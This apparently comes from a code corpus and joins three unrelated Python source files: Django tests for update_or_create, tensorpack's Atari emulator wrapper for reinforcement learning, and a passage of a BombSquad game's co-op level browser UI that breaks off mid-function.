self.assertEqual(p.books.count(), 1)
def test_update_with_related_manager(self):
"""
Should be able to use update_or_create from the related manager to
update a book. Refs #23611.
"""
p = Publisher.objects.create(name="Acme Publishing")
book = Book.objects.create(name="The Book of Ed & Fred", publisher=p)
self.assertEqual(p.books.count(), 1)
name = "The Book of Django"
book, created = p.books.update_or_create(defaults={'name': name}, id=book.id)
self.assertFalse(created)
self.assertEqual(book.name, name)
self.assertEqual(p.books.count(), 1)
def test_create_with_many(self):
"""
Should be able to use update_or_create from the m2m related manager to
create a book. Refs #23611.
"""
p = Publisher.objects.create(name="Acme Publishing")
author = Author.objects.create(name="Ted")
book, created = author.books.update_or_create(name="The Book of Ed & Fred", publisher=p)
self.assertTrue(created)
self.assertEqual(author.books.count(), 1)
def test_update_with_many(self):
"""
Should be able to use update_or_create from the m2m related manager to
update a book. Refs #23611.
"""
p = Publisher.objects.create(name="Acme Publishing")
author = Author.objects.create(name="Ted")
book = Book.objects.create(name="The Book of Ed & Fred", publisher=p)
book.authors.add(author)
self.assertEqual(author.books.count(), 1)
name = "The Book of Django"
book, created = author.books.update_or_create(defaults={'name': name}, id=book.id)
self.assertFalse(created)
self.assertEqual(book.name, name)
self.assertEqual(author.books.count(), 1)
def test_defaults_exact(self):
"""
If you have a field named defaults and want to use it as an exact
lookup, you need to use 'defaults__exact'.
"""
obj, created = Person.objects.update_or_create(
first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
'birthday': date(1943, 2, 25),
'defaults': 'testing',
}
)
self.assertTrue(created)
self.assertEqual(obj.defaults, 'testing')
obj, created = Person.objects.update_or_create(
first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
'birthday': date(1943, 2, 25),
'defaults': 'another testing',
}
)
self.assertFalse(created)
self.assertEqual(obj.defaults, 'another testing')
def test_create_callable_default(self):
obj, created = Person.objects.update_or_create(
first_name='George', last_name='Harrison',
defaults={'birthday': lambda: date(1943, 2, 25)},
)
self.assertIs(created, True)
self.assertEqual(obj.birthday, date(1943, 2, 25))
def test_update_callable_default(self):
Person.objects.update_or_create(
first_name='George', last_name='Harrison', birthday=date(1942, 2, 25),
)
obj, created = Person.objects.update_or_create(
first_name='George',
defaults={'last_name': lambda: 'NotHarrison'},
)
self.assertIs(created, False)
self.assertEqual(obj.last_name, 'NotHarrison')
class UpdateOrCreateTransactionTests(TransactionTestCase):
available_apps = ['get_or_create']
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_updates_in_transaction(self):
"""
Objects are selected and updated in a transaction to avoid race
conditions. This test forces update_or_create() to hold the lock
in another thread for a relatively long time so that it can update
while it holds the lock. The updated field isn't a field in 'defaults',
so update_or_create() shouldn't have an effect on it.
"""
lock_status = {'has_grabbed_lock': False}
def birthday_sleep():
lock_status['has_grabbed_lock'] = True
time.sleep(0.5)
return date(1940, 10, 10)
def update_birthday_slowly():
Person.objects.update_or_create(
first_name='John', defaults={'birthday': birthday_sleep}
)
# Avoid leaking connection for Oracle
connection.close()
def lock_wait():
# timeout after ~0.5 seconds
for i in range(20):
time.sleep(0.025)
if lock_status['has_grabbed_lock']:
return True
return False
Person.objects.create(first_name='John', last_name='Lennon', birthday=date(1940, 10, 9))
# update_or_create in a separate thread
t = Thread(target=update_birthday_slowly)
before_start = datetime.now()
t.start()
if not lock_wait():
self.skipTest('Database took too long to lock the row')
# Update during lock
Person.objects.filter(first_name='John').update(last_name='NotLennon')
after_update = datetime.now()
# Wait for thread to finish
t.join()
# The update remains and it blocked.
updated_person = Person.objects.get(first_name='John')
self.assertGreater(after_update - before_start, timedelta(seconds=0.5))
self.assertEqual(updated_person.last_name, 'NotLennon')
class InvalidCreateArgumentsTests(SimpleTestCase):
msg = "Invalid field name(s) for model Thing: 'nonexistent'."
def test_get_or_create_with_invalid_defaults(self):
with self.assertRaisesMessage(FieldError, self.msg):
Thing.objects.get_or_create(name='a', defaults={'nonexistent': 'b'})
def test_get_or_create_with_invalid_kwargs(self):
with self.assertRaisesMessage(FieldError, self.msg):
Thing.objects.get_or_create(name='a', nonexistent='b')
def test_update_or_create_with_invalid_defaults(self):
with self.assertRaisesMessage(FieldError, self.msg):
Thing.objects.update_or_create(name='a', defaults={'nonexistent': 'b'})
def test_update_or_create_with_invalid_kwargs(self):
with self.assertRaisesMessage(FieldError, self.msg):
Thing.objects.update_or_create(name='a', nonexistent='b')
def test_multiple_invalid_fields(self):
with self.assertRaisesMessage(FieldError, "Invalid field name(s) for model Thing: 'invalid', 'nonexistent'"):
Thing.objects.update_or_create(name='a', nonexistent='b', defaults={'invalid': 'c'})
|
atari.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: atari.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import numpy as np
import time, os
import cv2
from collections import deque
import threading
import six
from six.moves import range
from tensorpack.utils import (get_rng, logger, get_dataset_path, execute_only_once)
from tensorpack.utils.stats import StatCounter
from tensorpack.RL.envbase import RLEnvironment, DiscreteActionSpace
from ale_python_interface import ALEInterface
__all__ = ['AtariPlayer']
ROM_URL = "https://github.com/openai/atari-py/tree/master/atari_py/atari_roms"
_ALE_LOCK = threading.Lock()
class AtariPlayer(RLEnvironment):
"""
A wrapper for atari emulator.
Will automatically restart when a real episode ends (isOver might be just
lost of lives but not game over).
"""
def __init__(self, rom_file, viz=0, height_range=(None,None),
frame_skip=4, image_shape=(84, 84), nullop_start=30,
live_lost_as_eoe=True):
"""
:param rom_file: path to the rom
:param frame_skip: skip every k frames and repeat the action
:param image_shape: (w, h)
:param height_range: (h1, h2) to cut
:param viz: visualization to be done.
Set to 0 to disable.
Set to a positive number to be the delay between frames to show.
Set to a string to be a directory to store frames.
:param nullop_start: start with random number of null ops
:param live_losts_as_eoe: consider lost of lives as end of episode. useful for training.
"""
super(AtariPlayer, self).__init__()
if not os.path.isfile(rom_file) and '/' not in rom_file:
rom_file = get_dataset_path('atari_rom', rom_file)
assert os.path.isfile(rom_file), \
"rom {} not found. Please download at {}".format(rom_file, ROM_URL)
try:
ALEInterface.setLoggerMode(ALEInterface.Logger.Warning)
except AttributeError:
if execute_only_once():
logger.warn("You're not using latest ALE")
# avoid simulator bugs: https://github.com/mgbellemare/Arcade-Learning-Environment/issues/86
with _ALE_LOCK:
self.ale = ALEInterface()
self.rng = get_rng(self)
self.ale.setInt(b"random_seed", self.rng.randint(0, 30000))
self.ale.setBool(b"showinfo", False)
self.ale.setInt(b"frame_skip", 1)
self.ale.setBool(b'color_averaging', False)
# manual.pdf suggests otherwise.
self.ale.setFloat(b'repeat_action_probability', 0.0)
# viz setup
if isinstance(viz, six.string_types):
assert os.path.isdir(viz), viz
self.ale.setString(b'record_screen_dir', viz)
viz = 0
if isinstance(viz, int):
viz = float(viz)
self.viz = viz
if self.viz and isinstance(self.viz, float):
self.windowname = os.path.basename(rom_file)
cv2.startWindowThread()
cv2.namedWindow(self.windowname)
self.ale.loadROM(rom_file.encode('utf-8'))
self.width, self.height = self.ale.getScreenDims()
self.actions = self.ale.getMinimalActionSet()
self.live_lost_as_eoe = live_lost_as_eoe
self.frame_skip = frame_skip
self.nullop_start = nullop_start
self.height_range = height_range
self.image_shape = image_shape
self.current_episode_score = StatCounter()
self.restart_episode()
def _grab_raw_image(self):
"""
:returns: the current 3-channel image
"""
m = self.ale.getScreenRGB()
return m.reshape((self.height, self.width, 3))
def current_state(self):
"""
:returns: a gray-scale (h, w, 1) uint8 image
"""
ret = self._grab_raw_image()
# max-pooled over the last screen
ret = np.maximum(ret, self.last_raw_screen)
if self.viz:
if isinstance(self.viz, float):
cv2.imshow(self.windowname, ret)
time.sleep(self.viz)
ret = ret[self.height_range[0]:self.height_range[1],:].astype('float32')
# 0.299,0.587.0.114. same as rgb2y in torch/image
ret = cv2.cvtColor(ret, cv2.COLOR_RGB2GRAY)
ret = cv2.resize(ret, self.image_shape)
ret = np.expand_dims(ret, axis=2)
return ret.astype('uint8') # to save some memory
def get_action_space(self):
return DiscreteActionSpace(len(self.actions))
def finish_episode(self):
self.stats['score'].append(self.current_episode_score.sum)
def restart_episode(self):
self.current_episode_score.reset()
with _ALE_LOCK:
self.ale.reset_game()
# random null-ops start
n = self.rng.randint(self.nullop_start)
self.last_raw_screen = self._grab_raw_image()
for k in range(n):
if k == n - 1:
self.last_raw_screen = self._grab_raw_image()
self.ale.act(0)
def action(self, act):
"""
:param act: an index of the action
:returns: (reward, isOver)
"""
oldlives = self.ale.lives()
r = 0
for k in range(self.frame_skip):
if k == self.frame_skip - 1:
self.last_raw_screen = self._grab_raw_image()
r += self.ale.act(self.actions[act])
newlives = self.ale.lives()
if self.ale.game_over() or \
(self.live_lost_as_eoe and newlives < oldlives):
break
self.current_episode_score.feed(r)
isOver = self.ale.game_over()
if self.live_lost_as_eoe:
isOver = isOver or newlives < oldlives
if isOver:
self.finish_episode()
if self.ale.game_over():
self.restart_episode()
return (r, isOver)
if __name__ == '__main__':
import sys
import time
def benchmark():
a = AtariPlayer(sys.argv[1], viz=False, height_range=(28,-8))
num = a.get_action_space().num_actions()
rng = get_rng(num)
start = time.time()
cnt = 0
while True:
act = rng.choice(range(num))
r, o = a.action(act)
a.current_state()
cnt += 1
if cnt == 5000:
break
print(time.time() - start)
if len(sys.argv) == 3 and sys.argv[2] == 'benchmark':
import threading, multiprocessing
for k in range(3):
#th = multiprocessing.Process(target=benchmark)
th = threading.Thread(target=benchmark)
th.start()
time.sleep(0.02)
benchmark()
else:
a = AtariPlayer(sys.argv[1],
viz=0.03, height_range=(28,-8))
num = a.get_action_space().num_actions()
rng = get_rng(num)
import time
while True:
#im = a.grab_image()
#cv2.imshow(a.romname, im)
act = rng.choice(range(num))
print(act)
r, o = a.action(act)
a.current_state()
#time.sleep(0.1)
print(r, o)
|
browser.py | # Released under the MIT License. See LICENSE for details.
#
"""UI for browsing available co-op levels/games/etc."""
# FIXME: Break this up.
# pylint: disable=too-many-lines
from __future__ import annotations
import copy
from typing import TYPE_CHECKING
import _ba
import ba
from bastd.ui.store.button import StoreButton
from bastd.ui.league.rankbutton import LeagueRankButton
from bastd.ui.store.browser import StoreBrowserWindow
if TYPE_CHECKING:
from typing import Any, Optional, Tuple, Dict, List, Union
class CoopBrowserWindow(ba.Window):
"""Window for browsing co-op levels/games/etc."""
def _update_corner_button_positions(self) -> None:
uiscale = ba.app.ui.uiscale
offs = (-55 if uiscale is ba.UIScale.SMALL
and _ba.is_party_icon_visible() else 0)
if self._league_rank_button is not None:
self._league_rank_button.set_position(
(self._width - 282 + offs - self._x_inset, self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)))
if self._store_button is not None:
self._store_button.set_position(
(self._width - 170 + offs - self._x_inset, self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)))
def __init__(self,
transition: Optional[str] = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
# pylint: disable=cyclic-import
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
ba.set_analytics_screen('Coop Window')
app = ba.app
cfg = app.config
# Quick note to players that tourneys won't work in ballistica
# core builds. (need to split the word so it won't get subbed out)
if 'ballistica' + 'core' == _ba.appname():
ba.timer(1.0,
lambda: ba.screenmessage(
ba.Lstr(resource='noTournamentsInTestBuildText'),
color=(1, 1, 0),
),
timetype=ba.TimeType.REAL)
# If they provided an origin-widget, scale up from that.
scale_origin: Optional[Tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
# Try to recreate the same number of buttons we had last time so our
# re-selection code works.
self._tournament_button_count = app.config.get('Tournament Rows', 0)
assert isinstance(self._tournament_button_count, int)
self._easy_button: Optional[ba.Widget] = None
self._hard_button: Optional[ba.Widget] = None
self._hard_button_lock_image: Optional[ba.Widget] = None
self._campaign_percent_text: Optional[ba.Widget] = None
uiscale = ba.app.ui.uiscale
self._width = 1320 if uiscale is ba.UIScale.SMALL else 1120
self._x_inset = x_inset = 100 if uiscale is ba.UIScale.SMALL else 0
self._height = (657 if uiscale is ba.UIScale.SMALL else
730 if uiscale is ba.UIScale.MEDIUM else 800)
app.ui.set_main_menu_location('Coop Select')
self._r = 'coopSelectWindow'
top_extra = 20 if uiscale is ba.UIScale.SMALL else 0
self._tourney_data_up_to_date = False
self._campaign_difficulty = _ba.get_account_misc_val(
'campaignDifficulty', 'easy')
super().__init__(root_widget=ba.containerwidget(
size=(self._width, self._height + top_extra),
toolbar_visibility='menu_full',
scale_origin_stack_offset=scale_origin,
stack_offset=((0, -15) if uiscale is ba.UIScale.SMALL else (
0, 0) if uiscale is ba.UIScale.MEDIUM else (0, 0)),
transition=transition,
scale=(1.2 if uiscale is ba.UIScale.SMALL else
0.8 if uiscale is ba.UIScale.MEDIUM else 0.75)))
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
self._back_button = None
else:
self._back_button = ba.buttonwidget(
parent=self._root_widget,
position=(75 + x_inset, self._height - 87 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(120, 60),
scale=1.2,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back')
self._league_rank_button: Optional[LeagueRankButton]
self._store_button: Optional[StoreButton]
self._store_button_widget: Optional[ba.Widget]
self._league_rank_button_widget: Optional[ba.Widget]
if not app.ui.use_toolbars:
prb = self._league_rank_button = LeagueRankButton(
parent=self._root_widget,
position=(self._width - (282 + x_inset), self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(100, 60),
color=(0.4, 0.4, 0.9),
textcolor=(0.9, 0.9, 2.0),
scale=1.05,
on_activate_call=ba.WeakCall(self._switch_to_league_rankings))
self._league_rank_button_widget = prb.get_button()
sbtn = self._store_button = StoreButton(
parent=self._root_widget,
position=(self._width - (170 + x_inset), self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(100, 60),
color=(0.6, 0.4, 0.7),
show_tickets=True,
button_type='square',
sale_scale=0.85,
textcolor=(0.9, 0.7, 1.0),
scale=1.05,
on_activate_call=ba.WeakCall(self._switch_to_score, None))
self._store_button_widget = sbtn.get_button()
ba.widget(edit=self._back_button,
right_widget=self._league_rank_button_widget)
ba.widget(edit=self._league_rank_button_widget,
left_widget=self._back_button)
else:
self._league_rank_button = None
self._store_button = None
self._store_button_widget = None
self._league_rank_button_widget = None
# Move our corner buttons dynamically to keep them out of the way of
# the party icon :-(
self._update_corner_button_positions()
self._update_corner_button_positions_timer = ba.Timer(
1.0,
ba.WeakCall(self._update_corner_button_positions),
repeat=True,
timetype=ba.TimeType.REAL)
self._last_tournament_query_time: Optional[float] = None
self._last_tournament_query_response_time: Optional[float] = None
self._doing_tournament_query = False
self._selected_campaign_level = (cfg.get(
'Selected Coop Campaign Level', None))
self._selected_custom_level = (cfg.get('Selected Coop Custom Level',
None))
self._selected_challenge_level = (cfg.get(
'Selected Coop Challenge Level', None))
# Don't want initial construction affecting our last-selected.
self._do_selection_callbacks = False
v = self._height - 95
txt = ba.textwidget(
parent=self._root_widget,
position=(self._width * 0.5,
v + 40 - (0 if uiscale is ba.UIScale.SMALL else 0)),
size=(0, 0),
text=ba.Lstr(resource='playModes.singlePlayerCoopText',
fallback_resource='playModes.coopText'),
h_align='center',
color=app.ui.title_color,
scale=1.5,
maxwidth=500,
v_align='center')
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.textwidget(edit=txt, text='')
if self._back_button is not None:
ba.buttonwidget(
edit=self._back_button,
button_type='backSmall',
size=(60, 50),
position=(75 + x_inset, self._height - 87 -
(4 if uiscale is ba.UIScale.SMALL else 0) + 6),
label=ba.charstr(ba.SpecialChar.BACK))
self._selected_row = cfg.get('Selected Coop Row', None)
self.star_tex = ba.gettexture('star')
self.lsbt = ba.getmodel('level_select_button_transparent')
self.lsbo = ba.getmodel('level_select_button_opaque')
self.a_outline_tex = ba.gettexture('achievementOutline')
self.a_outline_model = ba.getmodel('achievementOutline')
self._scroll_width = self._width - (130 + 2 * x_inset)
self._scroll_height = (self._height -
(190 if uiscale is ba.UIScale.SMALL
and app.ui.use_toolbars else 160))
self._subcontainerwidth = 800.0
self._subcontainerheight = 1400.0
self._scrollwidget = ba.scrollwidget(
parent=self._root_widget,
highlight=False,
position=(65 + x_inset, 120) if uiscale is ba.UIScale.SMALL
and app.ui.use_toolbars else (65 + x_inset, 70),
size=(self._scroll_width, self._scroll_height),
simple_culling_v=10.0,
claims_left_right=True,
claims_tab=True,
selection_loops_to_parent=True)
self._subcontainer: Optional[ba.Widget] = None
# Take note of our account state; we'll refresh later if this changes.
self._account_state_num = _ba.get_account_state_num()
# Same for fg/bg state.
self._fg_state = app.fg_state
self._refresh()
self._restore_state()
# Even though we might display cached tournament data immediately, we
# don't consider it valid until we've pinged.
# the server for an update
self._tourney_data_up_to_date = False
# If we've got a cached tournament list for our account and info for
# each one of those tournaments, go ahead and display it as a
# starting point.
if (app.accounts.account_tournament_list is not None
and app.accounts.account_tournament_list[0]
== _ba.get_account_state_num()
and all(t_id in app.accounts.tournament_info
for t_id in app.accounts.account_tournament_list[1])):
tourney_data = [
app.accounts.tournament_info[t_id]
for t_id in app.accounts.account_tournament_list[1]
]
self._update_for_data(tourney_data)
# This will pull new data periodically, update timers, etc.
self._update_timer = ba.Timer(1.0,
ba.WeakCall(self._update),
timetype=ba.TimeType.REAL,
repeat=True)
self._update()
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
import bastd.ui.purchase as _unused1
import bastd.ui.coop.gamebutton as _unused2
import bastd.ui.confirm as _unused3
import bastd.ui.account as _unused4
import bastd.ui.league.rankwindow as _unused5
import bastd.ui.store.browser as _unused6
import bastd.ui.account.viewer as _unused7
import bastd.ui.tournamentscores as _unused8
import bastd.ui.tournamententry as _unused9
import bastd.ui.play as _unused10
def _update(self) -> None:
# Do nothing if we've somehow outlived our actual UI.
if not self._root_widget:
return
cur_time = ba.time(ba.TimeType.REAL)
# If its been a while since we got a tournament update, consider the
# data invalid (prevents us from joining tournaments if our internet
# connection goes down for a while).
if (self._last_tournament_query_response_time is None
or ba.time(ba.TimeType.REAL) -
self._last_tournament_query_response_time > 60.0 * 2):
self._tourney_data_up_to_date = False
# If our account state has changed, do a full request.
account_state_num = _ba.get_account_state_num()
if account_state_num != self._account_state_num:
self._account_state_num = account_state_num
self._save_state()
self._refresh()
# Also encourage a new tournament query since this will clear out
# our current results.
if not self._doing_tournament_query:
self._last_tournament_query_time = None
# If we've been backgrounded/foregrounded, invalidate our
# tournament entries (they will be refreshed below asap).
if self._fg_state != ba.app.fg_state:
self._tourney_data_up_to_date = False
# Send off a new tournament query if its been long enough or whatnot.
if not self._doing_tournament_query and (
self._last_tournament_query_time is None
or cur_time - self._last_tournament_query_time > 30.0
or self._fg_state != ba.app.fg_state):
self._fg_state = ba.app.fg_state
self._last_tournament_query_time = cur_time
self._doing_tournament_query = True
_ba.tournament_query(
args={
'source': 'coop window refresh',
'numScores': 1
},
callback=ba.WeakCall(self._on_tournament_query_response),
)
# Decrement time on our tournament buttons.
ads_enabled = _ba.have_incentivized_ad()
for tbtn in self._tournament_buttons:
tbtn['time_remaining'] = max(0, tbtn['time_remaining'] - 1)
if tbtn['time_remaining_value_text'] is not None:
ba.textwidget(
edit=tbtn['time_remaining_value_text'],
text=ba.timestring(tbtn['time_remaining'],
centi=False,
suppress_format_warning=True) if
(tbtn['has_time_remaining']
and self._tourney_data_up_to_date) else '-')
# Also adjust the ad icon visibility.
if tbtn.get('allow_ads', False) and _ba.has_video_ads():
ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
opacity=1.0 if ads_enabled else 0.25)
ba.textwidget(edit=tbtn['entry_fee_text_remaining'],
color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
self._update_hard_mode_lock_image()
def _update_hard_mode_lock_image(self) -> None:
try:
ba.imagewidget(
edit=self._hard_button_lock_image,
opacity=0.0 if ba.app.accounts.have_pro_options() else 1.0)
except Exception:
ba.print_exception('Error updating campaign lock.')
def _update_for_data(self, data: Optional[List[Dict[str, Any]]]) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
from ba.internal import getcampaign, get_tournament_prize_strings
# If the number of tournaments or challenges in the data differs from
# our current arrangement, refresh with the new number.
if ((data is None and self._tournament_button_count != 0)
or (data is not None and
(len(data) != self._tournament_button_count))):
self._tournament_button_count = len(
data) if data is not None else 0
ba.app.config['Tournament Rows'] = self._tournament_button_count
self._refresh()
# Update all of our tourney buttons based on whats in data.
for i, tbtn in enumerate(self._tournament_buttons):
assert data is not None
entry: Dict[str, Any] = data[i]
prize_y_offs = (34 if 'prizeRange3' in entry else
20 if 'prizeRange2' in entry else 12)
x_offs = 90
# This seems to be a false alarm.
# pylint: disable=unbalanced-tuple-unpacking
pr1, pv1, pr2, pv2, pr3, pv3 = (
get_tournament_prize_strings(entry))
# pylint: enable=unbalanced-tuple-unpacking
enabled = 'requiredLeague' not in entry
ba.buttonwidget(edit=tbtn['button'],
color=(0.5, 0.7, 0.2) if enabled else
(0.5, 0.5, 0.5))
ba.imagewidget(edit=tbtn['lock_image'],
opacity=0.0 if enabled else 1.0)
ba.textwidget(edit=tbtn['prize_range_1_text'],
text='-' if pr1 == '' else pr1,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 + prize_y_offs))
# We want to draw values containing tickets a bit smaller
# (scratch that; we now draw medals a bit bigger).
ticket_char = ba.charstr(ba.SpecialChar.TICKET_BACKING)
prize_value_scale_large = 1.0
prize_value_scale_small = 1.0
ba.textwidget(edit=tbtn['prize_value_1_text'],
text='-' if pv1 == '' else pv1,
scale=prize_value_scale_large if ticket_char
not in pv1 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_range_2_text'],
text=pr2,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 45 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_value_2_text'],
text=pv2,
scale=prize_value_scale_large if ticket_char
not in pv2 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 45 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_range_3_text'],
text=pr3,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 90 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_value_3_text'],
text=pv3,
scale=prize_value_scale_large if ticket_char
not in pv3 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 90 + prize_y_offs))
leader_name = '-'
leader_score: Union[str, ba.Lstr] = '-'
if entry['scores']:
score = tbtn['leader'] = copy.deepcopy(entry['scores'][0])
leader_name = score[1]
leader_score = (ba.timestring(
score[0] * 10,
centi=True,
timeformat=ba.TimeFormat.MILLISECONDS,
suppress_format_warning=True) if entry['scoreType']
== 'time' else str(score[0]))
else:
tbtn['leader'] = None
ba.textwidget(edit=tbtn['current_leader_name_text'],
text=ba.Lstr(value=leader_name))
self._tournament_leader_score_type = (entry['scoreType'])
ba.textwidget(edit=tbtn['current_leader_score_text'],
text=leader_score)
ba.buttonwidget(edit=tbtn['more_scores_button'],
label=ba.Lstr(resource=self._r + '.seeMoreText'))
out_of_time_text: Union[str, ba.Lstr] = (
'-' if 'totalTime' not in entry else ba.Lstr(
resource=self._r + '.ofTotalTimeText',
subs=[('${TOTAL}',
ba.timestring(entry['totalTime'],
centi=False,
suppress_format_warning=True))]))
ba.textwidget(edit=tbtn['time_remaining_out_of_text'],
text=out_of_time_text)
tbtn['time_remaining'] = entry['timeRemaining']
tbtn['has_time_remaining'] = entry is not None
tbtn['tournament_id'] = entry['tournamentID']
tbtn['required_league'] = (None if 'requiredLeague' not in entry
else entry['requiredLeague'])
game = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['game']
if game is None:
ba.textwidget(edit=tbtn['button_text'], text='-')
ba.imagewidget(edit=tbtn['image'],
texture=ba.gettexture('black'),
opacity=0.2)
else:
campaignname, levelname = game.split(':')
campaign = getcampaign(campaignname)
max_players = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['maxPlayers']
txt = ba.Lstr(
value='${A} ${B}',
subs=[('${A}', campaign.getlevel(levelname).displayname),
('${B}',
ba.Lstr(resource='playerCountAbbreviatedText',
subs=[('${COUNT}', str(max_players))]))])
ba.textwidget(edit=tbtn['button_text'], text=txt)
ba.imagewidget(
edit=tbtn['image'],
texture=campaign.getlevel(levelname).get_preview_texture(),
opacity=1.0 if enabled else 0.5)
fee = entry['fee']
if fee is None:
fee_var = None
elif fee == 4:
fee_var = 'price.tournament_entry_4'
elif fee == 3:
fee_var = 'price.tournament_entry_3'
elif fee == 2:
fee_var = 'price.tournament_entry_2'
elif fee == 1:
fee_var = 'price.tournament_entry_1'
else:
if fee != 0:
print('Unknown fee value:', fee)
fee_var = 'price.tournament_entry_0'
tbtn['allow_ads'] = allow_ads = entry['allowAds']
final_fee: Optional[int] = (None if fee_var is None else
_ba.get_account_misc_read_val(
fee_var, '?'))
final_fee_str: Union[str, ba.Lstr]
if fee_var is None:
final_fee_str = ''
else:
if final_fee == 0:
final_fee_str = ba.Lstr(
resource='getTicketsWindow.freeText')
else:
final_fee_str = (
ba.charstr(ba.SpecialChar.TICKET_BACKING) +
str(final_fee))
ad_tries_remaining = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['adTriesRemaining']
free_tries_remaining = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['freeTriesRemaining']
# Now, if this fee allows ads and we support video ads, show
# the 'or ad' version.
if allow_ads and _ba.has_video_ads():
ads_enabled = _ba.have_incentivized_ad()
ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
opacity=1.0 if ads_enabled else 0.25)
or_text = ba.Lstr(resource='orText',
subs=[('${A}', ''),
('${B}', '')]).evaluate().strip()
ba.textwidget(edit=tbtn['entry_fee_text_or'], text=or_text)
ba.textwidget(
edit=tbtn['entry_fee_text_top'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 60),
scale=1.3,
text=final_fee_str)
# Possibly show number of ad-plays remaining.
ba.textwidget(
edit=tbtn['entry_fee_text_remaining'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 146),
text='' if ad_tries_remaining in [None, 0] else
('' + str(ad_tries_remaining)),
color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
else:
ba.imagewidget(edit=tbtn['entry_fee_ad_image'], opacity=0.0)
ba.textwidget(edit=tbtn['entry_fee_text_or'], text='')
ba.textwidget(
edit=tbtn['entry_fee_text_top'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 80),
scale=1.3,
text=final_fee_str)
# Possibly show number of free-plays remaining.
ba.textwidget(
edit=tbtn['entry_fee_text_remaining'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 100),
text=('' if (free_tries_remaining in [None, 0]
or final_fee != 0) else
('' + str(free_tries_remaining))),
color=(0.6, 0.6, 0.6, 1))
def _on_tournament_query_response(self, data: Optional[Dict[str,
Any]]) -> None:
accounts = ba.app.accounts
if data is not None:
tournament_data = data['t'] # This used to be the whole payload.
self._last_tournament_query_response_time = ba.time(
ba.TimeType.REAL)
else:
tournament_data = None
# Keep our cached tourney info up to date.
if data is not None:
self._tourney_data_up_to_date = True
accounts.cache_tournament_info(tournament_data)
# Also cache the current tourney list/order for this account.
accounts.account_tournament_list = (_ba.get_account_state_num(), [
e['tournamentID'] for e in tournament_data
])
self._doing_tournament_query = False
self._update_for_data(tournament_data)
def _set_campaign_difficulty(self, difficulty: str) -> None:
# pylint: disable=cyclic-import
from bastd.ui.purchase import PurchaseWindow
if difficulty != self._campaign_difficulty:
if difficulty == 'hard' and not ba.app.accounts.have_pro_options():
PurchaseWindow(items=['pro'])
return
ba.playsound(ba.getsound('gunCocking'))
if difficulty not in ('easy', 'hard'):
print('ERROR: invalid campaign difficulty:', difficulty)
difficulty = 'easy'
self._campaign_difficulty = difficulty
_ba.add_transaction({
'type': 'SET_MISC_VAL',
'name': 'campaignDifficulty',
'value': difficulty
})
self._refresh_campaign_row()
else:
ba.playsound(ba.getsound('click01'))
def _refresh_campaign_row(self) -> None:
# pylint: disable=too-many-locals
# pylint: disable=cyclic-import
from ba.internal import getcampaign
from bastd.ui.coop.gamebutton import GameButton
parent_widget = self._campaign_sub_container
# Clear out anything in the parent widget already.
for child in parent_widget.get_children():
child.delete()
next_widget_down = self._tournament_info_button
h = 0
v2 = -2
sel_color = (0.75, 0.85, 0.5)
sel_color_hard = (0.4, 0.7, 0.2)
un_sel_color = (0.5, 0.5, 0.5)
sel_textcolor = (2, 2, 0.8)
un_sel_textcolor = (0.6, 0.6, 0.6)
self._easy_button = ba.buttonwidget(
parent=parent_widget,
position=(h + 30, v2 + 105),
size=(120, 70),
label=ba.Lstr(resource='difficultyEasyText'),
button_type='square',
autoselect=True,
enable_sound=False,
on_activate_call=ba.Call(self._set_campaign_difficulty, 'easy'),
on_select_call=ba.Call(self.sel_change, 'campaign', 'easyButton'),
color=sel_color
if self._campaign_difficulty == 'easy' else un_sel_color,
textcolor=sel_textcolor
if self._campaign_difficulty == 'easy' else un_sel_textcolor)
